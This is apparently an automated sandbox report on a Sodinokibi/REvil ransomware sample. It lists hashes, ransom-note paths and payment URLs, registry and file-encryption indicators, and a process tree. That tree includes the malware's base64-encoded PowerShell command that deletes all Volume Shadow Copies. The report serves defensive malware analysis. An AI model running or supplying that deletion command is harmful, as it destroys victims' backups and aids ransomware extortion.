Analysis
-
max time kernel
45s -
max time network
57s -
platform
windows7_x64 -
resource
win7v200722 -
submitted
20-08-2020 13:04
Static task
static1
Behavioral task
behavioral1
Sample
d0fb6f4c608994c787f15ee3b5cc1297180687522ade080c07a708e55ce23de8.bin.exe.dll
Resource
win7v200722
Behavioral task
behavioral2
Sample
d0fb6f4c608994c787f15ee3b5cc1297180687522ade080c07a708e55ce23de8.bin.exe.dll
Resource
win10v200722
General
-
Target
d0fb6f4c608994c787f15ee3b5cc1297180687522ade080c07a708e55ce23de8.bin.exe.dll
-
Size
116KB
-
MD5
946a25739c934f91f795e002a9f77bda
-
SHA1
48fa5f0d87d162f8ae67e01d7ee309ae8fa976cf
-
SHA256
d0fb6f4c608994c787f15ee3b5cc1297180687522ade080c07a708e55ce23de8
-
SHA512
07e6ec47cfbb44975ff7e69973c8154d8f26af1acb26e62b40e0003943953ab87b15a222b14bae7bfb74849f9aff36d727372cff3c3954418db7d28e9119ae69
Malware Config
Extracted
C:\evlj584f-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/CFD95459DCCAE4E1
http://decryptor.cc/CFD95459DCCAE4E1
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
rundll32.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2lf42u968782.bmp" rundll32.exe -
Drops file in Program Files directory 38 IoCs
Processes:
rundll32.exedescription ioc process File opened for modification \??\c:\program files\DismountUnblock.xsl rundll32.exe File created \??\c:\program files\microsoft sql server compact edition\evlj584f-readme.txt rundll32.exe File opened for modification \??\c:\program files\SubmitDisconnect.contact rundll32.exe File opened for modification \??\c:\program files\UseEdit.odt rundll32.exe File opened for modification \??\c:\program files\MountRestore.xltm rundll32.exe File opened for modification \??\c:\program files\PopFormat.midi rundll32.exe File opened for modification \??\c:\program files\RegisterConfirm.csv rundll32.exe File opened for modification \??\c:\program files\UndoInstall.xhtml rundll32.exe File opened for modification \??\c:\program files\ClearEdit.xls rundll32.exe File opened for modification \??\c:\program files\CompleteDebug.wmv rundll32.exe File opened for modification \??\c:\program files\DebugSuspend.mp2v rundll32.exe File opened for modification \??\c:\program files\JoinOpen.xla rundll32.exe File opened for modification \??\c:\program files\TraceStep.tmp rundll32.exe File created \??\c:\program files\evlj584f-readme.txt rundll32.exe File opened for modification \??\c:\program files\ClearInvoke.m1v rundll32.exe File opened for modification \??\c:\program files\ConvertRead.pps rundll32.exe File opened for modification \??\c:\program files\ResolveBlock.jpg rundll32.exe File opened for modification \??\c:\program files\ExportUnblock.xml rundll32.exe File opened for modification \??\c:\program files\UnprotectPop.crw rundll32.exe File opened for modification \??\c:\program files\UnpublishSuspend.kix rundll32.exe File opened for modification \??\c:\program files\UseRedo.ogg rundll32.exe File created \??\c:\program files (x86)\evlj584f-readme.txt rundll32.exe File opened for modification \??\c:\program files\GetGrant.pptx rundll32.exe File opened for modification \??\c:\program files\UnregisterLimit.mp2 rundll32.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\evlj584f-readme.txt rundll32.exe File opened for modification \??\c:\program files\CheckpointWait.mp4v rundll32.exe File opened for modification \??\c:\program files\GroupConvertTo.tiff rundll32.exe File opened for modification \??\c:\program files\ResolveReceive.inf rundll32.exe File opened for modification \??\c:\program files\SaveInvoke.mhtml rundll32.exe File opened for modification \??\c:\program files\SyncSplit.mid rundll32.exe File opened for modification \??\c:\program files\UndoConfirm.tif rundll32.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\evlj584f-readme.txt rundll32.exe File opened for modification \??\c:\program files\ConnectOpen.mpv2 rundll32.exe File opened for modification \??\c:\program files\MeasureMove.wmf rundll32.exe File opened for modification \??\c:\program files\RestoreReset.odp rundll32.exe File opened for modification \??\c:\program files\ResumeCompress.jtx rundll32.exe File opened for modification \??\c:\program files\StartGrant.txt rundll32.exe File opened for modification \??\c:\program files\UnprotectSuspend.vbe rundll32.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
rundll32.exepowershell.exepid process 1596 rundll32.exe 756 powershell.exe 756 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
rundll32.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1596 rundll32.exe Token: SeDebugPrivilege 756 powershell.exe Token: SeBackupPrivilege 1904 vssvc.exe Token: SeRestorePrivilege 1904 vssvc.exe Token: SeAuditPrivilege 1904 vssvc.exe Token: SeTakeOwnershipPrivilege 1596 rundll32.exe -
Suspicious use of WriteProcessMemory 11 IoCs
Processes:
rundll32.exerundll32.exedescription pid process target process PID 112 wrote to memory of 1596 112 rundll32.exe rundll32.exe PID 112 wrote to memory of 1596 112 rundll32.exe rundll32.exe PID 112 wrote to memory of 1596 112 rundll32.exe rundll32.exe PID 112 wrote to memory of 1596 112 rundll32.exe rundll32.exe PID 112 wrote to memory of 1596 112 rundll32.exe rundll32.exe PID 112 wrote to memory of 1596 112 rundll32.exe rundll32.exe PID 112 wrote to memory of 1596 112 rundll32.exe rundll32.exe PID 1596 wrote to memory of 756 1596 rundll32.exe powershell.exe PID 1596 wrote to memory of 756 1596 rundll32.exe powershell.exe PID 1596 wrote to memory of 756 1596 rundll32.exe powershell.exe PID 1596 wrote to memory of 756 1596 rundll32.exe powershell.exe
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\d0fb6f4c608994c787f15ee3b5cc1297180687522ade080c07a708e55ce23de8.bin.exe.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:112 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\d0fb6f4c608994c787f15ee3b5cc1297180687522ade080c07a708e55ce23de8.bin.exe.dll,#12⤵
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1596 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:756
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:1688
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1904